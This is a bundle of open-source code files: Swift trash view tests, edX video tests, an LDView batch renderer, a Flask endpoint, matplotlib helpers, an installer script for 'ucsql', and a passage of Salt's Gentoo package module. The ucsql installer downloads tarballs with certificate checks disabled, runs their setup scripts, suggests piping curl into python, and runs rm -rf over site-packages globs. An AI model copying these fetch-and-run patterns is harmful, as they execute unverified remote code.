| LukeC92/iris | lib/iris/tests/unit/lazy_data/test_as_concrete_data.py | Python | lgpl-3.0 | 3,347 |
# -*- coding: utf-8 -*-
import json
from unittest.mock import patch, Mock
from unittest import TestCase
from swiftclient import client
from storage.tests import fakes
from storage import views
from vault.tests.fakes import fake_request
class TestSwiftTrash(TestCase):
    """View tests for the Swift trash endpoints (list, restore, remove)."""
    def setUp(self):
        self.request = fake_request()
        # silence log
        patch('storage.views.log',
              Mock(return_value=None)).start()
        patch('identity.keystone.Keystone',
              Mock(return_value=None)).start()
    def tearDown(self):
        # Undo every patch started in setUp (and any started per-test).
        patch.stopall()
    def test_deleted_objects_list_needs_authentication(self):
        # Anonymous users are redirected (302) instead of served.
        req = fake_request(user=False)
        response = views.get_deleted_objects(req)
        self.assertEqual(response.status_code, 302)
    @patch("storage.views.client.get_container")
    def test_get_deleted_objects_returns_a_json(self, mock_get_container):
        mock_get_container.return_value = fakes.get_container()
        project_name = self.request.session.get('project_name')
        response = views.get_deleted_objects(self.request, project_name, 'container1')
        self.assertIn(b'application/json', response.serialize_headers())
    @patch("storage.views.client.get_container")
    def test_check_properties_from_get_deleted_objects_content(self, mock_get_container):
        # The JSON payload must expose every key the frontend relies on.
        mock_get_container.return_value = fakes.get_container(trash_container=".trash-container1")
        project_name = self.request.session.get('project_name')
        response = views.get_deleted_objects(self.request, project_name, 'container1')
        expected_items = ["deleted_objects", "prefix", "storage_url",
                          "trash_container", "original_container"]
        result = json.loads(response.content)
        for item in expected_items:
            self.assertIn(item, result)
    @patch("storage.views.client.get_container")
    def test_get_deleted_objects_client_exception(self, mock_get_container):
        # Swift client errors are surfaced as a JSON error with the status.
        mock_get_container.side_effect = client.ClientException("error message",
                                                                http_status=500)
        project_name = self.request.session.get('project_name')
        response = views.get_deleted_objects(self.request, project_name, 'container1')
        self.assertEqual(response.content.decode(), '{"error": "error message"}')
        self.assertEqual(response.status_code, 500)
    # NOTE(review): the tests below patch the very view they then call, so
    # they exercise only the mock's return value -- confirm this is intended.
    @patch("storage.views.remove_from_trash")
    def test_deleted_objects_from_trash(self, mock_trash_remove):
        mock_trash_remove.return_value = fakes.FakeRequestResponse(200)
        response = views.remove_from_trash(self.request)
        self.assertEqual(response.status_code, 200)
    @patch("storage.views.remove_from_trash")
    def test_deleted_objects_from_trash_with_fail(self, mock_trash_remove):
        mock_trash_remove.return_value = fakes.FakeRequestResponse(500)
        response = views.remove_from_trash(self.request)
        self.assertEqual(response.status_code, 500)
    @patch("storage.views.delete_pseudofolder")
    def test_deleted_objects_from_pseudofolder(self, mock_remove_from_pseudo_folder):
        mock_remove_from_pseudo_folder.return_value = fakes.FakeRequestResponse(200)
        response = views.delete_pseudofolder(self.request, "container1", "pseudofolder")
        self.assertEqual(response.status_code, 200)
    @patch("storage.views.delete_pseudofolder")
    def test_deleted_objects_from_pseudofolder_with_fail(self, mock_remove_from_pseudo_folder):
        mock_remove_from_pseudo_folder.return_value = fakes.FakeRequestResponse(500)
        response = views.delete_pseudofolder(self.request, "container1", "pseudofolder")
        self.assertEqual(response.status_code, 500)
    @patch("storage.views.restore_object")
    def test_restore_object_from_trash(self, mock_restore):
        mock_restore.return_value = fakes.FakeRequestResponse(202)
        response = views.restore_object(self.request)
        self.assertEqual(response.status_code, 202)
    @patch("storage.views.restore_object")
    def test_restore_object_from_trash_with_fail_error_on_put_object(self, mock_restore):
        mock_restore.return_value = fakes.FakeRequestResponse(500)
        response = views.restore_object(self.request)
        self.assertEqual(response.status_code, 500)
    @patch("storage.views.restore_object")
    def test_restore_object_from_trash_with_fail_object_exists_on_container(self, mock_restore):
        # 409 Conflict: an object with the same name already exists.
        mock_restore.return_value = fakes.FakeRequestResponse(409)
        response = views.restore_object(self.request)
        self.assertEqual(response.status_code, 409)
| globocom/vault | storage/tests/test_swift_trash.py | Python | apache-2.0 | 4,672 |
# -*- coding: utf-8 -*-
# pylint: disable=protected-access
"""Test for Video Xmodule functional logic.
These test data read from xml, not from mongo.
We have a ModuleStoreTestCase class defined in
common/lib/xmodule/xmodule/modulestore/tests/django_utils.py.
You can search for usages of this in the cms and lms tests for examples.
You use this so that it will do things like point the modulestore
setting to mongo, flush the contentstore before and after, load the
templates, etc.
You can then use the CourseFactory and XModuleItemFactory as defined in
common/lib/xmodule/xmodule/modulestore/tests/factories.py to create the
course, section, subsection, unit, etc.
"""
from nose.plugins.attrib import attr
from xmodule.tests import LogicTest
from xmodule.video_module import VideoDescriptor
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
youtube="0.75:jNCf2gIqpeE,1.0:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg"
sub="a_sub_file.srt.sjson"
download_video="true"
start_time="01:00:03" end_time="01:00:10"
>
<source src="example.mp4"/>
<source src="example.webm"/>
<transcript language="uk" src="ukrainian_translation.srt" />
</video>
"""
@attr(shard=1)
class VideoModuleLogicTest(LogicTest):
"""Tests for logic of Video Xmodule."""
descriptor_class = VideoDescriptor
raw_field_data = {
'data': '<video />'
}
def test_parse_youtube(self):
"""Test parsing old-style Youtube ID strings into a dict."""
youtube_str = '0.75:jNCf2gIqpeE,1.00:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': 'jNCf2gIqpeE',
'1.00': 'ZwkTiUPN0mg',
'1.25': 'rsq9auxASqI',
'1.50': 'kMyNdzVHHgg'})
def test_parse_youtube_one_video(self):
"""
Ensure that all keys are present and missing speeds map to the
empty string.
"""
youtube_str = '0.75:jNCf2gIqpeE'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': 'jNCf2gIqpeE',
'1.00': '',
'1.25': '',
'1.50': ''})
def test_parse_youtube_key_format(self):
"""
Make sure that inconsistent speed keys are parsed correctly.
"""
youtube_str = '1.00:p2Q6BrNhdh8'
youtube_str_hack = '1.0:p2Q6BrNhdh8'
self.assertEqual(
VideoDescriptor._parse_youtube(youtube_str),
VideoDescriptor._parse_youtube(youtube_str_hack)
)
def test_parse_youtube_empty(self):
"""
Some courses have empty youtube attributes, so we should handle
that well.
"""
self.assertEqual(VideoDescriptor._parse_youtube(''),
{'0.75': '',
'1.00': '',
'1.25': '',
'1.50': ''})
| Stanford-Online/edx-platform | lms/djangoapps/courseware/tests/test_video_xml.py | Python | agpl-3.0 | 3,114 |
#!/usr/bin/python
#
# Run multiple LDViews in parallel to make pictures faster. On my computer I can
# get about a 2x speed-up with this.
#
# Hazen 11/15
#
import os
import Queue
import signal
import subprocess
import sys
import thread
def batchLDView(file_pairs, width = 200, height = 200, default_zoom = 0.95, max_processes = 6, rerender = True):
    """
    file_pairs is an array of [[input_file1, output_file1], [input_file2, output_file2], ..]

    Renders each input LDraw file to its output snapshot by running up to
    max_processes LDView instances concurrently; existing pictures are kept
    unless rerender is True.  Python 2 module (Queue/thread/print).
    """
    # Setup process queue.
    process_count = 0
    results = Queue.Queue()
    # Start processes.
    n_files = len(file_pairs)
    procs = []
    for i, file_pair in enumerate(file_pairs):
        # Don't redraw the picture if we already have a picture.
        if os.path.exists(file_pair[1]) and not rerender:
            continue
        try:
            # Wait for a process to stop before starting
            # the next one if we are at the limit.
            if(process_count >= max_processes):
                description, rc = results.get()
                print description
                process_count -= 1
            proc = subprocess.Popen(['LDView',
                                     file_pair[0],
                                     "-SaveSnapshot=" + file_pair[1],
                                     "-SaveActualSize=0",
                                     "-SaveWidth=" + str(width),
                                     "-SaveHeight=" + str(height),
                                     "-DefaultZoom=" + str(default_zoom)])
            procs.append(proc)
            # A waiter thread posts (description, returncode) when LDView exits.
            thread.start_new_thread(process_waiter,
                                    (proc,
                                     "Rendered (" + str(i) + " / " + str(n_files) + ") " + file_pair[0],
                                     results))
            process_count += 1
        except KeyboardInterrupt:
            # NOTE(review): signal.CTRL_C_EVENT exists on Windows only --
            # confirm this script is not expected to run elsewhere.
            for proc in procs:
                if(not proc.poll()):
                    proc.send_signal(signal.CTRL_C_EVENT)
    # Wait until all the processes finish.
    try:
        while(process_count>0):
            description, rc = results.get()
            print description
            process_count -= 1
    except KeyboardInterrupt:
        for proc in procs:
            if(not proc.poll()):
                proc.send_signal(signal.CTRL_C_EVENT)
def process_waiter(popen, description, que):
    """Block until *popen* exits, then post (description, returncode) on *que*.

    Runs on a worker thread so batchLDView's main loop can block on the queue.
    """
    try:
        popen.wait()
    finally:
        que.put((description, popen.returncode))
#
# If you run this in standalone mode it will generate pictures
# of all your parts in the current directory.
#
if (__name__ == '__main__'):
    import opensdraw.lcad_lib.ldrawPath as ldrawPath
    # Create list of parts.
    print "Creating part list."
    ldraw_path = ldrawPath.getLDrawPath()
    all_parts = []
    with open(ldraw_path + "parts.lst") as part_list:
        for part in part_list:
            # Each line is "<file> <description...>"; keep the file name only.
            text = ' '.join(part.split())
            file_name = text.split()[0]
            # Picture lands in the cwd as "<part-number>_71.png".
            picture_name = file_name[:-4] + "_71.png"
            file_name = ldraw_path + "parts" + os.path.sep + file_name
            all_parts.append([file_name, picture_name])
            #if (len(all_parts) > 100):
            #    break
    # Render.
    print "Rendering."
    batchLDView(all_parts, rerender = False)
#
# The MIT License
#
# Copyright (c) 2015 Hazen Babcock
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
| HazenBabcock/opensdraw | opensdraw/partviewer/batchPictureGeneration.py | Python | mit | 4,421 |
# Core
from app.api import api
from flask import jsonify
from flask.ext.cors import cross_origin
# Models
from app.models.location import Location
@api.route('/locations', methods=['GET'])
@cross_origin()
def get_locations():
    """
    :return: Return a list with all locations

    Note: @cross_origin() must sit *below* the route decorator.  In the
    original order Flask registered the unwrapped view function, so the
    CORS headers were never actually applied to responses.
    """
    # Fetch every location and serialise it for the JSON payload.
    locations = Location.query.all()
    result = [location.get_information() for location in locations]
    return jsonify(locations=result)
| boltzj/movies-in-sf | app/api/locations.py | Python | mit | 492 |
#!/usr/bin/env python
#
# setup_setup.py for 'ucsql'
#
# This is the 'easy button' for installation of 'ucsql'
# Given the many dependencies, this script will optionally go an install everything it needs.
# If admins wish to install packages manually, then they can skip this.
# This script is assumed to be run from 'setup.py', but can be run standalone.
# Any missing pre-requisites will be flagged during the normal 'setup.py'
#
import sys
import os
import glob
#
# Make sure we have what we might need
#
# Many packages don't install properly with 'pip', so install them here via 'yum' or 'zypper'
#
# 'linuxprereqs' includes the dependency, and the determinator. Assumes local package installe (yum, zypper, ...)
#
# 'lxml' has too many dependencies to install manually as a pythonprereq. Install via yum/zypper
#
linuxprereqs = { "wget" : "which wget >/dev/null 2>&1",
"gcc" : "which gcc >/dev/null 2>&1",
"python-devel" : "rpm -qa | grep python-dev 2>&1",
"python-lxml" : "rpm -qa | grep lxml 2>&1"
}
#
# 'pythonpreqs' include the module needed and the source URL if it needs to be installed
#
# 'setuptools', 'pip', etc are not 100% consistent/reliable, so we'll do it by hand
#
pythonprereqs = {
# 'lxml' : { 'namevers' : 'lxml-3.2.3', 'wget' : 'https://pypi.python.org/packages/source/l/lxml/lxml-3.2.3.tar.gz#md5=fef47bb4ac72ac38ce778518dac42236' } ,
'setuptools' : { 'namevers' : 'setuptools-1.4.1', 'wget': 'https://pypi.python.org/packages/source/s/setuptools/setuptools-1.4.1.tar.gz#md5=65bb270fbae373c26a2fa890ad907818'} ,
'Crypto' : { 'namevers' : 'pycrypto-2.6.1', 'wget': 'https://ftp.dlitz.net/pub/dlitz/crypto/pycrypto/pycrypto-2.6.1.tar.gz'},
'pyparsing' : { 'namevers' : 'pyparsing-2.0.1', 'wget' : 'http://cheeseshop.python.org/packages/source/p/pyparsing/pyparsing-2.0.1.tar.gz' }
}
def install_this(mod):
    """Download, unpack and 'python setup.py install' the prerequisite *mod*,
    using the URL and directory name recorded in pythonprereqs."""
    cmd = "wget --no-check-certificate " + pythonprereqs[mod]['wget']
    print cmd
    os.system (cmd)
    # The tarball is assumed to unpack into a directory named <namevers>.
    cmd = "tar xzvf " + pythonprereqs[mod]['namevers'] + ".tar.gz"
    print cmd
    os.system (cmd)
    os.chdir (pythonprereqs[mod]['namevers'])
    os.system ("python setup.py install")
    os.chdir ("..")
def main():
# linux = os.popen("egrep 'Linux|CentOS' /etc/issue").readline()
# if ('Red Hat' in linux or 'CentOS' in linux):
# cmd = "yum install -y "
# elif ('SUSE' in linux):
# cmd = "zypper install -y "
# else:
# print "Sorry, but your Linux distro %s is not yet supported" % linux
# return -1
cmd = "yum install -y "
#
# Cleanup boogers and eggs from previous installs
#
boogers = ['/usr/lib64/python2.*/site-packages/ucsql*',
'/usr/local/lib/python2.*/site-packages/ucsql*',
'/usr/local/lib/python2.*/dist-packages/ucsql*',
'/usr/lib/python2.*/site-packages/ucsql*' ]
for b in boogers:
for e in glob.glob(b):
cmd = "rm -rf %s" % (e)
print "Cleaning up from previous (bad) installation : ", cmd
os.system (cmd)
for i in linuxprereqs:
dep = os.system (linuxprereqs[i])
if dep != 0:
tcmd = cmd + i
print
print "About to run '%s'" % tcmd
try:
raw_input( "Okay? [ or hit ^C ]")
except:
print
print "Exiting ..."
return -1
print tcmd
os.system (tcmd)
else:
print i, " is currently installed"
for i in pythonprereqs:
pcmd = "python -c \"import %s\" > /dev/null 2>&1" % i
if os.system (pcmd) != 0:
print
print i + " : Not found. Installing from : " + pythonprereqs[i]['wget']
print
install_this (i)
try:
import pkg_resources
except ImportError:
print "Missing 'pkg_resources'. Please run 'curl https://bitbucket.org/pypa/setuptools/raw/bootstrap/ez_setup.py | python'"
print "... and then rerun this install script"
return -1
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
#
# Make sure 'generateDS' is installed. Need to download/install directly, if needed.
#
generateDS = os.popen ("which generateDS.py 2>/dev/null").read().strip()
if generateDS == "":
# Go install it.
os.system ("wget --no-check-certificate https://pypi.python.org/packages/source/g/generateDS/generateDS-2.12a.tar.gz#md5=69e60733668c95ae26f9f6da0576cbfc; tar xzvf generateDS-2.12a.tar.gz; cd generateDS-2.12a; python setup.py install; cd ..")
#
# Remove XML boogers, if any. These represent conflicts with generateDS/lxml
#
boogers = ['/usr/lib64/python2.*/site-packages/_xmlplus',
'/usr/local/lib/python2.*/site-packages/_xmlplus',
'/usr/local/lib/python2.*/dist-packages/_xmlplus',
'/usr/lib/python2.*/site-packages/_xmlplus' ]
for b in boogers:
if glob.glob(b):
print "The '_xmlplus' directory has been detected in : ", glob.glob(b)
print "This will unfortunately conflict with the 'lxml' package libraries"
print "If you can, please delete the %s directory, and then rerun this setup script" % glob.glob(b)
return -1
return 0
if __name__ == "__main__":
    # Propagate main()'s status (0 or -1) to the shell so callers can
    # detect failure.
    sys.exit(main())
| ucsql/ucsql | setup_setup.py | Python | apache-2.0 | 5,477 |
import matplotlib
import matplotlib.pyplot as plt
from functools import wraps
def ensure_ax(func):
    """
    Decorator guaranteeing that *func* receives a matplotlib Axes as its
    first argument.

    The axes is taken, in order of precedence, from an ``ax`` keyword
    argument (popped from kwargs, even when its value is ``None``), from a
    leading positional ``Axes`` argument, or from ``plt.gca()``.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        # Keyword wins outright -- note a caller-supplied ax=None is
        # forwarded as-is, not replaced by gca().
        if 'ax' in kwargs:
            return func(kwargs.pop('ax'), *args, **kwargs)
        # Leading positional Axes: peel it off and re-pass explicitly.
        if args and isinstance(args[0], matplotlib.axes.Axes):
            return func(args[0], *args[1:], **kwargs)
        # Fall back to the current axes.
        return func(plt.gca(), *args, **kwargs)
    return wrapper
def ensure_ax_meth(func):
    """
    Method decorator analogous to :func:`ensure_ax`: guarantees that the
    wrapped method receives a matplotlib Axes as its first argument after
    ``self``.

    The axes comes from an ``ax`` keyword argument (popped, even if
    ``None``), a leading positional ``Axes`` argument, or ``plt.gca()``.
    """
    @wraps(func)
    def inner(*args, **kwargs):
        s = args[0]
        args = args[1:]
        if 'ax' in kwargs:
            ax = kwargs.pop('ax', None)
        # BUG FIX: this test was ``len(args) > 1``.  ``self`` has already
        # been stripped above, so (as in ensure_ax) a single remaining
        # positional argument can be the Axes; with ``> 1`` a call like
        # obj.meth(ax) ignored the axes and then passed it on twice.
        elif len(args) > 0 and isinstance(args[0], matplotlib.axes.Axes):
            ax = args[0]
            args = args[1:]
        else:
            ax = plt.gca()
        return func(s, ax, *args, **kwargs)
    return inner
| ericdill/xray-vision | xray_vision/utils/mpl_helpers.py | Python | bsd-3-clause | 861 |
"""
Support for Portage
.. important::
If you feel that Salt should be using this module to manage packages on a
minion, and it is using a different module (or gives an error similar to
*'pkg.install' is not available*), see :ref:`here
<module-provider-override>`.
:optdepends: - portage Python adapter
For now all package names *MUST* include the package category,
i.e. ``'vim'`` will not work, ``'app-editors/vim'`` will.
"""
import copy
import datetime
import logging
import os
import re
import salt.utils.args
import salt.utils.compat
import salt.utils.data
import salt.utils.functools
import salt.utils.path
import salt.utils.pkg
import salt.utils.systemd
import salt.utils.versions
from salt.exceptions import CommandExecutionError, MinionError
HAS_PORTAGE = False
try:
import portage
HAS_PORTAGE = True
except ImportError:
import os
import sys
if os.path.isdir("/usr/lib/portage/pym"):
try:
# In a virtualenv, the portage python path needs to be manually added
sys.path.insert(0, "/usr/lib/portage/pym")
import portage
HAS_PORTAGE = True
except ImportError:
pass
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = "pkg"
def __virtual__():
    """
    Confirm this module is on a Gentoo based system
    """
    # Bail out early unless both the portage bindings and a Gentoo grain
    # are present; otherwise expose this module under the 'pkg' name.
    if not HAS_PORTAGE or __grains__["os"] != "Gentoo":
        return (
            False,
            "The ebuild execution module cannot be loaded: either the system is not Gentoo"
            " or the portage python library is not available.",
        )
    return __virtualname__
def _vartree():
    """
    Return the portage vartree (the installed-package database) for the
    configured portage root.  ``portage`` is re-imported and reloaded on
    every call so on-disk configuration changes are picked up.
    """
    import portage  # pylint: disable=3rd-party-module-not-gated

    portage = salt.utils.compat.reload(portage)
    return portage.db[portage.root]["vartree"]
def _porttree():
    """
    Return the portage porttree (the available-package/ebuild tree) for the
    configured portage root.  ``portage`` is re-imported and reloaded on
    every call so on-disk configuration changes are picked up.
    """
    import portage  # pylint: disable=3rd-party-module-not-gated

    portage = salt.utils.compat.reload(portage)
    return portage.db[portage.root]["porttree"]
def _p_to_cp(p):
    """
    Resolve a package name or atom *p* to its ``category/package`` key.

    Three progressively looser portage lookups are attempted; the first
    one that yields a result wins.  Returns ``None`` when portage cannot
    resolve the name at all.
    """
    # 1) Treat p as a dependency atom and extract its key directly.
    try:
        ret = portage.dep_getkey(p)
        if ret:
            return ret
    except portage.exception.InvalidAtom:
        pass

    # 2) Fall back to the best *visible* match in the portage tree.
    try:
        ret = _porttree().dbapi.xmatch("bestmatch-visible", p)
        if ret:
            return portage.dep_getkey(ret)
    except portage.exception.InvalidAtom:
        pass

    # 3) Last resort: any match at all (visible or masked).
    try:
        ret = _porttree().dbapi.xmatch("match-all", p)
        if ret:
            return portage.cpv_getkey(ret[0])
    except portage.exception.InvalidAtom:
        pass

    return None
def _allnodes():
    """
    Return every atom known to the portage tree, caching the (expensive)
    result in ``__context__`` for the life of this minion invocation.
    """
    cache_key = "portage._allnodes"
    if cache_key not in __context__:
        __context__[cache_key] = _porttree().getallnodes()
    return __context__[cache_key]
def _cpv_to_cp(cpv):
    """
    Reduce a ``category/package-version`` string to ``category/package``.

    Tries the atom-based and cpv-based portage helpers in turn; if both
    fail, the input is returned unchanged.
    """
    try:
        ret = portage.dep_getkey(cpv)
        if ret:
            return ret
    except portage.exception.InvalidAtom:
        pass

    try:
        ret = portage.cpv_getkey(cpv)
        if ret:
            return ret
    except portage.exception.InvalidAtom:
        pass

    # Could not be parsed; hand back the original string.
    return cpv
def _cpv_to_version(cpv):
    """Extract the version component of a ``category/package-version`` string."""
    return portage.versions.cpv_getversion(cpv)
def _process_emerge_err(stdout, stderr):
"""
Used to parse emerge output to provide meaningful output when emerge fails
"""
ret = {}
rexp = re.compile(r"^[<>=][^ ]+/[^ ]+ [^\n]+", re.M)
slot_conflicts = re.compile(r"^[^ \n]+/[^ ]+:[^ ]", re.M).findall(stderr)
if slot_conflicts:
ret["slot conflicts"] = slot_conflicts
blocked = re.compile(
r"(?m)^\[blocks .+\] " r"([^ ]+/[^ ]+-[0-9]+[^ ]+)" r".*$"
).findall(stdout)
unsatisfied = re.compile(r"Error: The above package list contains").findall(stderr)
# If there were blocks and emerge could not resolve it.
if blocked and unsatisfied:
ret["blocked"] = blocked
sections = re.split("\n\n", stderr)
for section in sections:
if "The following keyword changes" in section:
ret["keywords"] = rexp.findall(section)
elif "The following license changes" in section:
ret["license"] = rexp.findall(section)
elif "The following USE changes" in section:
ret["use"] = rexp.findall(section)
elif "The following mask changes" in section:
ret["mask"] = rexp.findall(section)
return ret
def check_db(*names, **kwargs):
    """
    .. versionadded:: 0.17.0

    Returns a dict containing the following information for each specified
    package:

    1. A key ``found``, which will be a boolean value denoting if a match was
       found in the package database.
    2. If ``found`` is ``False``, then a second key called ``suggestions`` will
       be present, which will contain a list of possible matches. This list
       will be empty if the package name was specified in ``category/pkgname``
       format, since the suggestions are only intended to disambiguate
       ambiguous package names (ones submitted without a category).

    CLI Examples:

    .. code-block:: bash

        salt '*' pkg.check_db <package1> <package2> <package3>
    """
    ### NOTE: kwargs is not used here but needs to be present due to it being
    ### required in the check_db function in other package providers.
    ret = {}
    for name in names:
        if name in ret:
            log.warning("pkg.check_db: Duplicate package name '%s' submitted", name)
            continue
        entry = ret.setdefault(name, {})
        if "/" not in name:
            # Bare package name: cannot be looked up directly, offer
            # category/name candidates instead.
            entry["found"] = False
            entry["suggestions"] = porttree_matches(name)
        else:
            entry["found"] = name in _allnodes()
            if not entry["found"]:
                entry["suggestions"] = []
    return ret
def ex_mod_init(low):
    """
    If the config option ``ebuild.enforce_nice_config`` is set to True, this
    module will enforce a nice tree structure for /etc/portage/package.*
    configuration files.

    .. versionadded:: 0.17.0
       Initial automatic enforcement added when pkg is used on a Gentoo system.

    .. versionchanged:: 2014.7.0
       Configure option added to make this behaviour optional, defaulting to
       off.

    .. seealso::
       ``ebuild.ex_mod_init`` is called automatically when a state invokes a
       pkg state on a Gentoo system.
       :py:func:`salt.states.pkg.mod_init`

       ``ebuild.ex_mod_init`` uses ``portage_config.enforce_nice_config`` to do
       the lifting.
       :py:func:`salt.modules.portage_config.enforce_nice_config`

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.ex_mod_init
    """
    # Opt-in behaviour: do nothing unless the minion config enables it.
    enforce = __salt__["config.get"]("ebuild.enforce_nice_config", False)
    if enforce:
        __salt__["portage_config.enforce_nice_config"]()
    return True
def latest_version(*names, **kwargs):
    """
    Return the latest version of the named package available for upgrade or
    installation. If more than one package name is specified, a dict of
    name/version pairs is returned.

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.latest_version <package name>
        salt '*' pkg.latest_version <package1> <package2> <package3> ...
    """
    do_refresh = salt.utils.data.is_true(kwargs.pop("refresh", True))

    if not names:
        return ""

    # Refresh before looking for the latest version available
    if do_refresh:
        refresh_db()

    ret = {}
    for name in names:
        # Default to "no upgrade available".
        ret[name] = ""
        installed = _cpv_to_version(_vartree().dep_bestmatch(name))
        avail = _cpv_to_version(_porttree().dep_bestmatch(name))
        if not avail:
            continue
        if not installed or salt.utils.versions.compare(
            ver1=installed, oper="<", ver2=avail, cmp_func=version_cmp
        ):
            ret[name] = avail

    # Return a bare string when a single package name was passed.
    return ret[names[0]] if len(names) == 1 else ret
# available_version is being deprecated
# (kept as a backwards-compatible alias of latest_version)
available_version = salt.utils.functools.alias_function(
    latest_version, "available_version"
)
def _get_upgradable(backtrack=3):
    """
    Utility function to get upgradable packages

    Sample return data:
    { 'pkgname': '1.2.3-45', ... }
    """
    cmd = [
        "emerge",
        "--ask",
        "n",
        "--backtrack",
        "{}".format(backtrack),
        "--pretend",
        "--update",
        "--newuse",
        "--deep",
        "@world",
    ]

    call = __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
    if call["retcode"] != 0:
        msg = "Failed to get upgrades"
        # Prefer stderr for the failure detail; fall back to stdout.
        detail = call["stderr"] or call["stdout"]
        if detail:
            msg += ": " + detail
        raise CommandExecutionError(msg)

    out = call["stdout"]
    pkg_re = re.compile(
        r"(?m)^\[.+\] "
        r"([^ ]+/[^ ]+)"  # Package string
        "-"
        r"([0-9]+[^ ]+)"  # Version
        r".*$"
    )
    # findall yields (name, version) tuples; for duplicate names the last
    # occurrence wins, matching the original loop's behaviour.
    return {pkg_name: pkg_version for pkg_name, pkg_version in pkg_re.findall(out)}
def list_upgrades(refresh=True, backtrack=3, **kwargs):  # pylint: disable=W0613
    """
    List all available package upgrades.

    refresh
        Whether or not to sync the portage tree before checking for upgrades.

    backtrack
        Specifies an integer number of times to backtrack if dependency
        calculation fails due to a conflict or an unsatisfied dependency
        (default: ´3´).

        .. versionadded:: 2015.8.0

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.list_upgrades
    """
    want_refresh = salt.utils.data.is_true(refresh)
    if want_refresh:
        refresh_db()
    return _get_upgradable(backtrack)
def upgrade_available(name, **kwargs):
    """
    Check whether or not an upgrade is available for a given package

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.upgrade_available <package name>
    """
    # latest_version returns the empty string when the package is already
    # at the newest available version.
    avail = latest_version(name)
    return avail != ""
def version(*names, **kwargs):
    """
    Returns a string representing the package version or an empty string if not
    installed. If more than one package name is specified, a dict of
    name/version pairs is returned.

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.version <package name>
        salt '*' pkg.version <package1> <package2> <package3> ...
    """
    # Thin wrapper: the generic pkg_resource implementation answers from
    # the installed-package list built by list_pkgs().
    return __salt__["pkg_resource.version"](*names, **kwargs)
def porttree_matches(name):
    """
    Returns a list containing the matches for a given package name from the
    portage tree. Note that the specific version of the package will not be
    provided for packages that have several versions in the portage tree, but
    rather the name of the package (i.e. "dev-python/paramiko").
    """
    matches = []
    for category in _porttree().dbapi.categories:
        atom = category + "/" + name
        # cp_list returns a non-empty list when the category carries the
        # package under any version.
        if _porttree().dbapi.cp_list(atom):
            matches.append(atom)
    return matches
def _list_pkgs_from_context(versions_as_list):
    """
    Use pkg list from __context__
    """
    cached = __context__["pkg.list_pkgs"]
    if versions_as_list:
        return cached
    # Callers that want string versions must not mutate the cached copy,
    # so stringify a deep copy instead.
    ret = copy.deepcopy(cached)
    __salt__["pkg_resource.stringify"](ret)
    return ret
def list_pkgs(versions_as_list=False, **kwargs):
    """
    List the packages currently installed in a dict::

        {'<package_name>': '<version>'}

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.list_pkgs
    """
    versions_as_list = salt.utils.data.is_true(versions_as_list)
    # not yet implemented or not applicable
    if any(
        salt.utils.data.is_true(kwargs.get(x)) for x in ("removed", "purge_desired")
    ):
        return {}

    # Serve from the per-invocation cache when present and permitted.
    if kwargs.get("use_context", True) and "pkg.list_pkgs" in __context__:
        return _list_pkgs_from_context(versions_as_list)

    ret = {}
    for cpv in _vartree().dbapi.cpv_all():
        __salt__["pkg_resource.add_pkg"](ret, _cpv_to_cp(cpv), _cpv_to_version(cpv))
    __salt__["pkg_resource.sort_pkglist"](ret)
    # Cache a deep copy so later stringification cannot corrupt the cache.
    __context__["pkg.list_pkgs"] = copy.deepcopy(ret)
    if not versions_as_list:
        __salt__["pkg_resource.stringify"](ret)
    return ret
def refresh_db(**kwargs):
    """
    Update the portage tree using the first available method from the following
    list:

    - emaint sync
    - eix-sync
    - emerge-webrsync
    - emerge --sync

    To prevent the portage tree from being synced within one day of the
    previous sync, add the following pillar data for this minion:

    .. code-block:: yaml

        portage:
          sync_wait_one_day: True

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.refresh_db
    """
    has_emaint = os.path.isdir("/etc/portage/repos.conf")
    has_eix = "eix.sync" in __salt__
    has_webrsync = bool(__salt__["makeconf.features_contains"]("webrsync-gpg"))

    # Remove rtag file to keep multiple refreshes from happening in pkg states
    salt.utils.pkg.clear_rtag(__opts__)

    # Option to prevent syncing package tree if done in the last 24 hours
    if __salt__["pillar.get"]("portage:sync_wait_one_day", False):
        main_repo_root = __salt__["cmd.run"]("portageq get_repo_path / gentoo")
        last_sync = datetime.datetime.fromtimestamp(os.path.getmtime(main_repo_root))
        if datetime.datetime.now() - last_sync < datetime.timedelta(days=1):
            log.info(
                "Did not sync package tree since last sync was done at"
                " %s, less than 1 day ago",
                last_sync,
            )
            return False

    if has_emaint:
        return __salt__["cmd.retcode"]("emaint sync -a") == 0
    if has_eix:
        return __salt__["eix.sync"]()
    if has_webrsync:
        # GPG sign verify is supported only for 'webrsync'.
        # Prefer 'delta-webrsync' to plain 'webrsync' when available.
